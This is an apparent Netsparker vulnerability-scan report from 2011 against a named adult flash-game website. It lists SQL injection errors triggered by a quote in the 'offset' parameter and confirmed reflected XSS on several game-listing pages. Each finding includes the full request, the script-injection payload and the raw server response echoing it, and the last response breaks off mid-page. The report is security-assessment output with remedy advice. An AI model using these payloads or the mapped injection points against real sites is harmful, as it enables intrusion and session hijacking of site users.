XSS, SQL Injection DORK Report for www.lessonofpassion.com

Loading
Netsparker - Scan Report Summary
TARGET URL
 http://www.lessonofpassion.com/user.php?type=...
SCAN DATE
 4/17/2011 3:18:45 PM
REPORT DATE
 4/17/2011 3:28:10 PM
SCAN DURATION
 00:07:44

Total Requests

Average Speed

req/sec.
33
identified
24
confirmed
4
critical
1
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Blind SQL Injection, Boolean SQL Injection, Command Injection, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
12 %
IMPORTANT
70 %
LOW
15 %
INFORMATION
3 %
[High Possibility] SQL Injection

[High Possibility] SQL Injection

4 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /games_best.php

/games_best.php

http://www.lessonofpassion.com/games_best.php?offset=%2527&id=3&category=3

Parameters

Parameter Type Value
offset GET %27
id GET 3
category GET 3

Request

GET /games_best.php?offset=%2527&id=3&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_best.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 137
Connection: close
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27,20' at line 1
- /games_dev.php

/games_dev.php

http://www.lessonofpassion.com/games_dev.php?offset=%2527&id=3&category=mnf

Parameters

Parameter Type Value
offset GET %27
id GET 3
category GET mnf

Request

GET /games_dev.php?offset=%2527&id=3&category=mnf HTTP/1.1
Referer: http://www.lessonofpassion.com/games_dev.php?type=category&category=mnf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 137
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27,20' at line 1
- /games_new.php

/games_new.php

http://www.lessonofpassion.com/games_new.php?offset=%2527&id=3&category=3

Parameters

Parameter Type Value
offset GET %27
id GET 3
category GET 3

Request

GET /games_new.php?offset=%2527&id=3&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 137
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27,20' at line 1
- /games_category.php

/games_category.php

http://www.lessonofpassion.com/games_category.php?offset=%2527&id=3&category=adventure

Parameters

Parameter Type Value
offset GET %27
id GET 3
category GET adventure

Request

GET /games_category.php?offset=%2527&id=3&category=adventure HTTP/1.1
Referer: http://www.lessonofpassion.com/games_category.php?type=category&category=adventure
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=23dbc668a5388626dfb199f6b4ffe058
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:01:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 137
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27,20' at line 1
Cross-site Scripting

Cross-site Scripting

22 TOTAL
IMPORTANT
CONFIRMED
21
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /games_category.php

/games_category.php CONFIRMED

http://www.lessonofpassion.com/games_category.php?type=category&category='%22--%3E%3C/style%3E%3C/sc..

Parameters

Parameter Type Value
type GET category
category GET '"--></style></script><script>alert(0x000146)</script>

Request

GET /games_category.php?type=category&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000146)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2172
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - \'\"--></style></script><script>netsparker(0x000146)</script> erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dadultcomics.com/?t=110138,1,4,1" target = "_blank"><img src="lopsalesforce/vert_3dac.jpg" border="0"></a></center></div><div id="sitecontent"> <div class="big">\'\"--></style></script><script>netsparker(0x000146)</script> games</div> <center><div class="clearfix"> </div><center> </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /games_best.php

/games_best.php CONFIRMED

http://www.lessonofpassion.com/games_best.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter Type Value
offset GET '"--></style></script><script>alert(0x000185)</script>
id GET 3
category GET 3

Request

GET /games_best.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000185)%3C/script%3E&id=3&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_best.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 176
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x000185)</script>,20' at line 1
- /games_best.php

/games_best.php CONFIRMED

http://www.lessonofpassion.com/games_best.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter Type Value
offset GET 20
id GET '"--></style></script><script>alert(0x000190)</script>
category GET 3

Request

GET /games_best.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000190)%3C/script%3E&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_best.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 3236
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - 3 erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://outcastacademy.com/index.php?targeo=lopvert" target = "_blank"><img src="lopsalesforce/outcastacademy_vert_160x600.jpg" border="0"></a></center></div><div id="sitecontent"> <div class="big">Best games</div> <div id="glinks"> <p><a href="lop_games.php?mygame=Denise Milani" title="Denise Milani"><img src="imago/denise.jpg" class = "game" width="157" height="112" ><span class = "def">Denise Milani</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Diva Mizuki Hawaiian" title="Diva Mizuki Hawaiian"><img src="imago/diva_mizuki_hawaii_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Diva Mizuki Hawaiian</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=The Agency" title="The Agency"><img src="imago/theagency.jpg" class = "game" width="157" height="112" ><span class = "def">The Agency</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Franks Adventure 4" title="Franks Adventure 4"><img src="imago/frank4_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Franks Adventure 4</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=MNF: Subway Story" title="MNF: Subway Story"><img src="imago/mnf_subway_story.jpg" class = "game" width="157" height="112" ><span class = "def">MNF: Subway Story</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Motoko vs Batou" title="Motoko vs Batou"><img src="imago/motoko_batou_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Motoko vs Batou</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Kristal Full" title="Kristal Full"><img src="imago/kristal.jpg" class = "game" width="157" height="112" ><span class = "def">Kristal Full</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Quick Fuck: Double Take" title="Quick Fuck: Double Take"><img src="imago/doubletake.jpg" class = "game" width="157" height="112" ><span class = "def">Quick Fuck: Double Take</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Rob the unfaithful" title="Rob the unfaithful"><img src="imago/rtu.jpg" class = "game" width="157" height="112" ><span class = "def">Rob the unfaithful</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Thorne" title="Thorne"><img src="imago/thorne.jpg" class = "game" width="157" height="112" ><span class = "def">Thorne</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Zoe and Vince" title="Zoe and Vince"><img src="imago/zoeandvince.jpg" class = "game" width="157" height="112" ><span class = "def">Zoe and Vince</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Treesome Fun" title="Treesome Fun"><img src="imago/threesome_fun_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Treesome Fun</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Dance School" title="Dance School"><img src="imago/dance-school_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Dance School</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Meet`N`Fuck Lesbian Ride" title="Meet`N`Fuck Lesbian Ride"><img src="imago/mnflr.jpg" class = "game" width="157" height="112" ><span class = "def">Meet`N`Fuck Lesbian Ride</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Jordan 500 stories" title="Jordan 500 stories"><img src="imago/j500stories.jpg" class = "game" width="157" height="112" ><span class = "def">Jordan 500 stories</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Lesbian Fashion" title="Lesbian Fashion"><img src="imago/lesbianfashion.jpg" class = "game" width="157" height="112" ><span class = "def">Lesbian Fashion</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Dirty pictures" title="Dirty pictures"><img src="imago/dirty.jpg" class = "game" width="157" height="112" ><span class = "def">Dirty pictures</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Miami Holidays" title="Miami Holidays"><img src="imago/mhol.jpg" class = "game" width="157" height="112" ><span class = "def">Miami Holidays</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny Afternoon 3" title="Horny Afternoon 3"><img src="imago/hornyafternoon3_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Horny Afternoon 3</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Sexy Strip Poker" title="Sexy Strip Poker"><img src="imago/strippoker.jpg" class = "game" width="157" height="112" ><span class = "def">Sexy Strip Poker</span><span class = "em">Logical</span><br /><span class = "gfxhot"></span> </a></p> </div> <center><div class="clearfix"> </div><center><a href="?offset=0&id=\'\"--></style></script><script>netsparker(0x000190)</script>&category=3"><strong>PREVIOUS</strong></a> &nbsp; <a href="?offset=0&id=\'\"--></style></script><script>netsparker(0x000190)</script>&category=3" >1</a> &nbsp; <strong>2</strong>&nbsp; <a href="?offset=40&id=\'\"--></style></script><script>netsparker(0x000190)</script>&category=3" >3</a> &nbsp; <a href="?offset=60&id=\'\"--></style></script><script>netsparker(0x000190)</script>&category=3" >4</a> &nbsp; <a href="?offset=80&id=\'\"--></style></script><script>netsparker(0x000190)</script>&category=3" >5</a> &nbsp; <a href="?offset=100&id=\'\"--></style></script><script>netsparker(0x000190)</script>&category=3" >6</a> &nbsp; <a href="?offset=120&id=\'\"--></style></script><script>netsparker(0x000190)</script>&category=3" >7</a> &nbsp; <a href="?offset=140&id=\'\"--></style></script><script>netsparker(0x000190)</script>&category=3" >8</a> &nbsp; <a href="?offset=40&id=\'\"--></style></script><script>netsparker(0x000190)</script>&category=3"><strong>NEXT</strong></a><p> </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><span class = "absi"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","380","height","220","src", "comlink?username=&quest=", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","comlink?username=&quest=" , "menu", "false", "z-index","-1","wmode", "transparent"); //end AC code</script></span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /games_dev.php

/games_dev.php CONFIRMED

http://www.lessonofpassion.com/games_dev.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
offset GET '"--></style></script><script>alert(0x00019D)</script>
id GET 3
category GET mnf

Request

GET /games_dev.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019D)%3C/script%3E&id=3&category=mnf HTTP/1.1
Referer: http://www.lessonofpassion.com/games_dev.php?type=category&category=mnf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 175
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x00019D)</script>,20' at line 1
- /games_best.php

/games_best.php CONFIRMED

http://www.lessonofpassion.com/games_best.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/scrip..

Parameters

Parameter Type Value
offset GET 20
id GET 3
category GET '"--></style></script><script>alert(0x00019F)</script>

Request

GET /games_best.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019F)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/games_best.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 3232
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - \'\"--></style></script><script>netsparker(0x00019F)</script> erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br 